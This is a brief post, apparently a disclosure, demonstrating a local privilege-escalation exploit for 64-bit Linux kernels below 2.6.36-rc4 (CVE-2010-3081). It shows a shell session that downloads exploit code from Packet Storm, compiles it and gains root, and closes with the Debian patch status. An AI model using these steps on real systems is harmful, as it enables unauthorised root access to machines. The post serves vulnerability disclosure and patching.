In any Linux Kernel 64 bits < 2.6.36-rc4:

-------------------------------------------- ibc@myserver :/tmp$ whoami ibc

ibc@myserver:/tmp$ wget http://packetstormsecurity.org/1009-exploits/robert_you_suck.c

ibc@myserver:/tmp$ gcc -o putada robert_you_suck.c

ibc@myserver:/tmp$ ./putada resolved symbol commit_creds to 0xffffffff81092120 resolved symbol prepare_kernel_cred to 0xffffffff81091fa0 mapping at 3f80000000 UID 0, EUID:0 GID:0, EGID:0

sh-3.2# whoami root <----------- OPSSSS !!! --------------------------------------------

More info:

http://packetstormsecurity.org/filedesc/robert_you_suck.c.html

Fixed in Debian (kernel patch backported):

http://security-tracker.debian.org/tracker/CVE-2010-3081 - lenny (security) 2.6.26-25lenny1 fixed - lenny-backports 2.6.32-23~bpo50+1 fixed - squeeze 2.6.32-23 fixed